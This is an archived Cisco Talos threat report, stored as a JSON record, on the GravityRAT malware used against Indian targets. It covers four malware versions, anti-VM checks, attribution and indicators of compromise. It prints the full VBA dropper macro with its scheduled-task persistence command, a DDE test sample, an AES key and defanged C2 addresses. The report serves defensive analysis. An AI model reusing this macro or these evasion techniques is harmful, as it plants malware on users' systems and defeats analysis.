{
	"id": "7b448b13-74a5-448d-b2fa-7a42cbe57d6d",
	"created_at": "2026-04-06T00:18:00.491608Z",
	"updated_at": "2026-04-10T03:19:59.210325Z",
	"deleted_at": null,
	"sha1_hash": "d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9",
	"title": "GravityRAT - The Two-Year Evolution Of An APT Targeting India",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 662598,
	"plain_text": "GravityRAT - The Two-Year Evolution Of An APT Targeting India\r\nBy Paul Rascagneres\r\nPublished: 2018-04-26 · Archived: 2026-04-05 20:16:17 UTC\r\nThursday, April 26, 2018 11:11\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres.\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 1 of 15\n\nUpdate: 4/30 Since the publication of the blog post, one of the anti-VM capability was commented a lot on\r\nTwitter: the detection of Virtual Machines by checking the temperature of the system. We decided to add more\r\ndetails and clarifications concerning this feature. GravityRAT uses a WMI request in order to get the current\r\ntemperature of the hardware. Here is the output of the query on a physical machine (a Surface Book):\r\nThe query returns the temperature of 7 thermal zones.\r\nHere is the output on a Virtual Machine executed by Hyper-V on the same hardware:\r\nThe feature is not supported. The malware author used this behavior in order to identify VM (such as Sandboxes).\r\nFrom our tests and the feedback from several researchers, this monitoring is not supported on Hyper-V, VMWare\r\nFusion, VirtualBox, KVM and XEN. It's important to notice that several recent physical systems do not support it\r\n(a researcher reported some Lenovo and Dell hosts did not support this). It means that GravityRAT will consider\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 2 of 15\n\nthis physical machine as VMs. Importantly to note this check is not foolproof as we have identified physical hosts\r\nwhich do not report back the temperature, however, it should also be considered a check that is identifying a lot of\r\nvirtual environments. This is particularly important due to the amount of sandboxing \u0026 malware detonation being\r\ncarried out within virtual environments by researchers.\r\nSummary\r\nToday, Cisco Talos is uncovering a new piece of malware, which has remained\r\nunder the radar for the past two years while it continues to be developed. Several\r\nweeks ago, we identified the use of the latest version of this RAT (Remote Access\r\nTool). In this article, we will discuss the technical capabilities, the evolution,\r\ndevelopment and potential attribution of what we are calling GravityRAT.\r\nGravityRAT has been under ongoing development for at least 18 months, during which the developer has\r\nimplemented new features. We've seen file exfiltration, remote command execution capability and anti-vm\r\ntechniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code\r\nexecution is concerning because it shows determination and innovation by the actor.\r\nThroughout our investigation, we observed several malicious documents used to attack victims, which we will\r\ndiscuss. These malicious documents were used by the developer to run several tests on the popular analysis\r\nplatform VirusTotal. Using VirusTotal allowed the developer to make changes in an attempt to decrease antivirus\r\ndetection.\r\nAlthough GravityRAT has not been previously published or discussed, there was some information from the\r\nNational Computer Emergency Response Team (CERT) of India describing GravityRAT as being used in targeted\r\nattacks against India. Finally, we will discuss specific attribution elements discovered during our research into\r\nGravityRAT as we identify specific information, which we believe to be leaked by the developer, such as location,\r\nand potentially their first name.\r\nInfection Vectors\r\nMalicious Office Documents\r\nThe majority of the malicious documents crafted by the malware author are Microsoft Office\r\nWord documents. The attacker uses an embedded macro in order to execute malicious code on the\r\nvictim's system. The document opens and appears as such:\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 3 of 15\n\nThe document asks to the user to enable macros in order to prove that the user is not a robot (similar to the\r\nCAPTCHA we often see on the internet). This, however, is a known tactic that a lot of Office-based malware uses.\r\nIt is an attempt to trick any users who are using Protected Mode on their systems. By enabling macros, the\r\nmalware is able to begin it's execution. We discovered that the embedded macro is quite small when extracted.\r\nSub AutoOpen()\r\n If Not Dir(Environ(\"TEMP\") + \"\\image4.exe\") \u003c\u003e \"\" Then\r\n Const lCancelled_c As Long = 0\r\n Dim sSaveAsPath As String\r\n sSaveAsPath = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\") + \"\\temporary.zip\"\r\n If VBA.LenB(sSaveAsPath) = lCancelled_c Then Exit Sub\r\n ActiveDocument.Save\r\n Application.Documents.Add ActiveDocument.FullName\r\n ActiveDocument.SaveAs sSaveAsPath\r\n ActiveDocument.Close\r\n Set app = CreateObject(\"Shell.Application\")\r\n ExtractTo = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\")\r\n ExtractByExtension app.NameSpace(Environ(\"TEMP\") + \"\\temporary.zip\"), \"exe\", ExtractTo\r\n End If\r\nEnd Sub\r\nSub ExtractByExtension(fldr, ext, dst)\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set app = CreateObject(\"Shell.Application\")\r\n For Each f In fldr.Items\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 4 of 15\n\nIf f.Type = \"File folder\" Then\r\n ExtractByExtension f.GetFolder, ext, dst\r\n ElseIf LCase(FSO.GetExtensionName(f.Name)) = LCase(ext) Then\r\n If Not Dir(Environ(\"TEMP\") + \"\\image4.exe\") \u003c\u003e \"\" Then\r\n app.NameSpace(dst).CopyHere f.Path, \u0026H4\r\n End If\r\n End If\r\n Next\r\n Shell \"schtasks /create /tn wordtest /tr \"\"'%temp%\\image4.exe' 35\"\" /sc DAILY /f /RI 10 /du 24:00 /st 00:01\"\r\nEnd Sub\r\nThis macro contains three functions:\r\nThe first one is executed when the document is opened. The purpose is to copy the active document (the\r\nopened Word document) in a temporary directory and to rename it as a ZIP archive. Indeed, the docx\r\nformat is, in fact, a common ZIP archive, and can be unzipped using common tools.\r\nThe second function decompresses this 'temporary.zip' file and extracts the .exe file stored in it.\r\nThe third creates a scheduled task, named 'wordtest', to execute this malicious file every day. With this\r\napproach, the attacker ensures that there is no direct execution (the executable is executed thanks to\r\nscheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the\r\ndocx format is an archive in order to include its executable (GravityRAT).\r\nTesting By The Author\r\nDuring our tracking, we identified several malicious documents submitted from this actor on\r\nVirusTotal for testing purposes. They tested the detection on macros (by modifying them, or by\r\nexecuting the calc instead of the malicious payload) and the developers tried dynamic data\r\nexchange (DDE) execution in the Office document. This is abusing the DDE protocol which exists\r\nwithin Microsoft Office documents. Whilst this is a feature Microsoft provide it is also a feature\r\nthat an attacker can leverage for malicious activity, Microsoft published mitigation information\r\nhere previously. The developer crafted Office Word and Excel documents to see the detection in\r\nVirusTotal. The authors tried to hide the DDE object in a different part of the document — in the\r\nmain object and the header, for example. The DDE object simply executes Microsoft calc in the\r\ndetected sample. Here is an example:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\r\n\u003cw:document [...redated...}] mc:Ignorable=\"w14 w15 wp14\"\u003e\u003cw:body\u003e\u003cw:p w:rsidR=\"00215C91\" w:rsidRDefault=\"008C166\r\nWe believe the filenames of the submitted samples are clearly testing docs, using different methods and Office\r\ntricks to attempt to ensure his malware was undetected. Those names were:\r\ntestnew1.docx\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 5 of 15\n\nTest123.docx\r\ntest456.docx\r\ntest2.docx\r\nbook1test2.xlsx\r\nTest123.doc\r\nGravityRAT\r\nOur initial discovery of GravityRAT was through a malicious Word document. As\r\nexplained previously, this Word document had various macros to deliver a final\r\npayload.Considering that this was the most recent version of the malware, we\r\ndecided to ascertain how long this actor had been active, and how their attacks had\r\nevolved. We were able to discover four distinct versions of GravityRAT, developed\r\nover two years. Next, we will go through what we believe is the development life\r\ncycle and feature-addition mission carried out by this developer.\r\nVersion G1\r\nThe malware author uses a versioning system starting by the G letter. The oldest version we\r\nidentified is G1. Here is the PDB path of the sample:\r\nf:\\F\\Windows Work\\G1\\Adeel's Laptop\\G1 Main Virus\\systemInterrupts\\gravity\\obj\\x86\\Debug\\systemInterrupts.pdb\r\nYou can notice the potential first name of the developers: Adeel. Of course, this information can be manipulated\r\nby the malware author. This sample was compiled in December 2016. The original filename of the sample was\r\nresume.exe.\r\nThe purpose of this version was to steal information on the compromised system:\r\nMAC Address\r\nComputer name\r\nUsername\r\nIP address\r\nDate\r\nSteal files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf and .pdf\r\nThe volumes mapped on the system\r\nAll this information was then sent to one of the following domains:\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 6 of 15\n\nG1 also had the ability to execute commands remotely on the infected host machine at the author's will.\r\nVersion G2\r\nWe identified a new variant used in July 2017 named G2. Here is the PDB of the sample:\r\ne:\\Windows Work\\G2\\G2 Main Virus\\Microsoft Virus Solutions (G2 v5) (Current)\\Microsoft Virus Solutions\\obj\\Debu\r\nFor this version, the developer modified the architecture of the malware. The main code aims to load and execute\r\ntwo additional .NET binaries stored in the resources of the file:\r\nThe first resource is a legitimate open-source library available on GitHub. It's a .NET wrapper for the\r\nWindows Task Scheduler\r\nThe second is the G2 version of GravityRAT\r\nThis variant shares the same command and control (C2) servers as G1, however, we have an additional\r\n'payload' variable added to G2.\r\nThis variant has almost identical capabilities as the previous, except one additional functionality: It collects the\r\nCPU information in the Win32_Processor entry via WMI request (Processor ID, Name, Manufacturer and the\r\nclock speed). The attacker is most likely using this information as part of an anti-vm attempt within this malware.\r\nThis is used to try and thwart analysis in virtual environments.\r\nIn a slight change to the previous variant, the new payloads are executed with a Windows Scheduled Task. This\r\nwould explain the inclusion of the .NET wrapper.\r\nThe analysed sample contained a decoy picture document in the resource section:\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 7 of 15\n\nVersion G3\r\nIn August 2017, the author of GravityRAT used a new variant of its malware, G3. Here is the\r\nPDB:\r\nF:\\Projects\\g3\\G3 Version 4.0\\G3\\G3\\obj\\Release\\Intel Core.pdb\r\nThis variant uses the same method as G2, and includes a legitimate library in the resource section. The developers\r\nalso added additional language support to the library:\r\nGerman\r\nSpanish\r\nFrench\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 8 of 15\n\nItalian\r\nChinese\r\nThe author changed the backend of the C2 server with this variant. The URI changed too, it contains the\r\nGravityRAT variant name:\r\nAugust was also the same month NIC CERT notified potential victims that GravityRAT had been used in a\r\ntargeted campaign. Given the ongoing development nature of this malware, it meant another variant was most\r\nlikely due.\r\nVersion GX\r\nThe latest version of GravityRAT was created in December 2017 named GX. Here is the PDB:\r\nC:\\Users\\The Invincible\\Desktop\\gx\\gx-current-program\\LSASS\\obj\\Release\\LSASS.pdb\r\nThis version is the most advanced variant of GravityRAT. Throughout the evolution, we saw this malware\r\nembedding open-source legitimate .NET libraries (for schedule tasks, compression, encryption, .NET loading). It\r\ncontains a resource named \"important.\" This is an archive with a password.\r\nThis variant has the same features as before, but this time, some new features are added:\r\nIt collects open ports on the victim host by running the netstat command\r\nIt lists all the running processes\r\nIt lists available services on the system\r\nIt exfiltrates .ppt and .pptx file, in addition to the extension mentioned in the G1 variant\r\nIf a USB key is connected on the system, the malware steals the file based on an extension list\r\nIt supports file encryption (AES with the key \"lolomycin2017\")\r\nIt collects information on the account (account type, description, domain name, full name, SID and status)\r\nIt checks if the system is a virtual machine with several techniques\r\nThe developer implemented a total of seven techniques to identify if the compromised system is a virtual machine.\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 9 of 15\n\nThe first technique consists of looking at any additional tools used by the hypervisor that are installed on the\r\nsystem (by checking a registry key):\r\nThe second technique uses a WMI request to the BIOS version (Win32_BIOS entry). If the response contains:\r\n\"VMware\", \"Virtual\", \"XEN\", \"Xen\" or \"A M I\" the system is considered as a virtual machine. Additionally, the\r\nmalware checks the SerialNumber and the version of the BIOS.\r\nThe third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\",\r\n\"VMWARE\" or \"VirtualBox\".\r\nThe fourth technique checks the Processor ID of the system.\r\nThe fifth technique counts the number of cores in the infected system (the author expects more than one core)\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 10 of 15\n\nThe sixth technique checks the current CPU temperature of the system (the MSAcpi_ThermalZoneTemperature\r\nentry). Indeed, some hypervisors (VMWare, VirtualBox and Hyper-V) do not support temperature check. The\r\nWMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real\r\nmachine.\r\nThe last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known\r\nhexadecimal number, the system is identified as a virtual machine.\r\nThe C2 servers communication is performed in HTTP as it did previously. The variant version of GX is used in\r\nthe URI. The C2 servers we can see are shared with the previous variants:\r\nWhat we know about the author\r\nBelow, we will present evidence that we have obtained regarding the attacker and\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 11 of 15\n\nthe associated malware. Obviously, attribution is a complex field. The developers\r\ncould be using a proxy or a VPN in order to fake the origin of the submission. But,\r\nwe will still simply present some facts concerning this actor.\r\nThe developer used at least two different usernames in the past two years: \"The Invincible\" and \"TheMartian.\" In\r\nthe oldest version of GravityRAT, the attacker potentially leaked his or her first name in the PDB: \"Adeel\" — the\r\npath contained \"Adeel's Laptop\". Additionally, all the malicious Office documents, and more specifically the\r\ndocuments used to test anti-virus on VirusTotal, were submitted from Pakistan. One of the four PE files in the\r\nIOCs section was sent from Pakistan, too.\r\nIn August 2017, NIC CERT published an advisory about malicious targeted campaigns. This advisory mentions\r\nthe C2 server infrastructure of GravityRAT, which means the GravityRAT author likely targeted Indian\r\nentities/organisations. By leveraging Cisco Umbrella and using the Investigate tool, we were able to determine\r\nthat across all of the C2 domains listed, we saw a large influx of traffic originating from India, as evidenced by\r\nNIC CERT, all of the C2 domains were at least 50 percent requested by Indian IP infrastructure. It is possible that\r\nsome of the non-Indian IP space requests may artefacts be due to our own research.\r\nConclusion\r\nThis actor is probably not the most advanced actor we've seen. But he or she\r\nmanaged to stay under the radar since 2016. They worked on malicious code, and\r\nproduced four variants. Each new variant included new features. The developer\r\nused the same C2 infrastructure all this time. The developer was clever enough to\r\nkeep this infrastructure safe, and not have it blocklisted by a security vendor. The\r\nactor took their time to ensure they were not within a virtual environment to avoid\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 12 of 15\n\nanalysis. However, they did not take any time at all to attempt to obfuscate their\r\n.NET code. The code was largely trivial to reverse engineer, which meant static\r\nanalysis was an easy option for this piece of malware.\r\nNIC CERT published an advisory about this actor, which suggest they targeted Indian entities and organizations.\r\nThe author leaked information within the samples (i.e. Adeel) and on the VirusTotal platform. Thanks to this\r\ninformation, we we able to understand how they tested malicious documents in order to decrease detection ratios\r\nacross many popular engines. During this testing period, all the samples were uploaded from Pakistan to\r\nVirusTotal.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCWSor WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with\r\nthis threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 13 of 15\n\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nMalicious Documents\r\nMacros\r\n0beb2eb1214d4fd78e1e92db579e24d12e875be553002a778fb38a225cadb703\r\n70dc2a4d9da2b3338dd0fbd0719e8dc39bc9d8e3e959000b8c8bb04c931aff82\r\n835e759735438cd3ad8f4c6dd8b035a3a07d6ce5ce48aedff1bcad962def1aa4\r\nC14f859eed0f4540ab41362d963388518a232deef8ecc63eb072d5477e151719\r\ned0eadd8e8e82e7d3829d71ab0926c409a23bf2e7a4ff6ea5b533c5defba4f2a\r\nf4806c5e4449a6f0fe5e93321561811e520f738cfe8d1cf198ef12672ff06136\r\nOther Malicious Documents\r\n(DDE)911269e72cd6ed4835040483c4860294d26bfb3b351df718afd367267cd9024f\r\nfb7aa28a9d8fcfcabacd7f390cee5a5ed67734602f6dfa599bff63466694d210\r\nef4769606adcd4f623eea29561596e5c0c628cb3932b30428c38cfe852aa8301\r\ncd140cf5a9030177316a15bef19745b0bebb4eb453ddb4038b5f15dacfaeb3a2\r\n07682c1626c80fa1bb33d7368f6539edf8867faeea4b94fedf2afd4565b91105\r\nGravityRAT\r\nG1 9f30163c0fe99825022649c5a066a4c972b76210368531d0cfa4c1736c32fb3a\r\nG2 1993f8d2606c83e22a262ac93cc9f69f972c04460831115b57b3f6244ac128bc\r\nG3 99dd67915566c0951b78d323bb066eb5b130cc7ebd6355ec0338469876503f90\r\nGX 1c0ea462f0bbd7acfdf4c6daf3cb8ce09e1375b766fbd3ff89f40c0aa3f4fc96\r\nC2 Servers hxxp://cone[.]msoftupdates.com:46769\r\nhxxp://ctwo[.]msoftupdates.com:46769\r\nhxxp://cthree[.]msoftupdates.com:46769\r\nhxxp://eone[.]msoftupdates.eu:46769\r\nhxxp://etwo[.]msoftupdates.eu:46769\r\nhxxp://msupdates[.]mylogisoft.com:46769\r\nhxxp://coreupdate[.]msoftupdates.com:46769\r\nhxxp://updateserver[.]msoftupdates.eu:46769\r\nmsoftupdates[.]com\r\nmsoftupdates[.]eu\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 14 of 15\n\nmylogisoft[.]com\r\nURI:\r\n/Gvty@/1ns3rt_39291384.php\r\n/Gvty@/newIns3rt.php\r\n/Gvty@/payloads\r\n/Gvty@/ip.php\r\n/G3/ServerSide/G3.php\r\n/G3/Payload/\r\n/GX/GX-Server.php\r\n/GetActiveDomains.php\r\nSource: https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 15 of 15\n\nGravityRAT By Paul Rascagneres - The Two-Year Evolution Of An APT Targeting India\nPublished: 2018-04-26 · Archived: 2026-04-05 20:16:17 UTC\nThursday, April 26, 2018 11:11  \nThis blog post is authored by Warren Mercer and Paul Rascagneres.\n   Page 1 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html"
	],
	"report_names": [
		"gravityrat-two-year-evolution-of-apt.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434680,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.pdf",
		"text": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.txt",
		"img": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.jpg"
	}
}